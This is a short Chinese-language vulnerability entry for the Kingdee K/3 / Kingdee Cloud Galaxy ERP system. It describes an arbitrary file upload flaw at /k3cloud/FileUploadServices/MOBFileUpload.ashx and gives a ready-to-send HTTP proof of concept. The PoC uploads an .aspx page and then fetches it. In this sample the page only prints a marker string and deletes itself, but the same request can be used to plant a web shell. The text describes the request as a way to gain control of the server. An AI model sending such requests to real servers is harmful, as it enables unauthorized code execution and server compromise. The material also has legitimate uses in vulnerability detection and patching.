漏洞描述
金蝶 K/3 以企业基础管理为核心设计思想,对覆盖产品(服务)价值链的业务的流程进行全面的计划、组织、协调,及对业务的有效处理和有效控制的管理。针对战略企业管理的特点,强调对企业基础数据、基本业务流程、内部控制、知识管理、员工行为规范等管理,通过丰富的工具与方法有机整合并提供贯穿战略企业管理全过程所需的决策信息,实时监控战略执行过程中的问题,帮助企业创造持续增长的核心竞争力。
金蝶K3存在任意文件上传漏洞,攻击者可利用该漏洞上传恶意文件,并控制服务器权限
金蝶云星空 /MOBFileUpload.ashx 路径存在任意文件上传漏洞
PoC代码
POST /k3cloud/FileUploadServices/MOBFileUpload.ashx HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=26b6e55df2a6a2f5f95457fedd373ebf
--26b6e55df2a6a2f5f95457fedd373ebf
Content-Disposition: form-data; name="submit"
submit
--26b6e55df2a6a2f5f95457fedd373ebf
Content-Disposition: form-data; name="file"; filename="6bed8c1ef7.aspx"
Content-Type: text/plain
<%@Page Language="C#"%><%Response.Write("622ba2d1d85d38c72403aec3b9aaf411");System.IO.File.Delete(Request.PhysicalPath);%>
--26b6e55df2a6a2f5f95457fedd373ebf--
GET /k3cloud/FileUploadServices/uploadfiles/6bed8c1ef7.aspx HTTP/1.1
Host: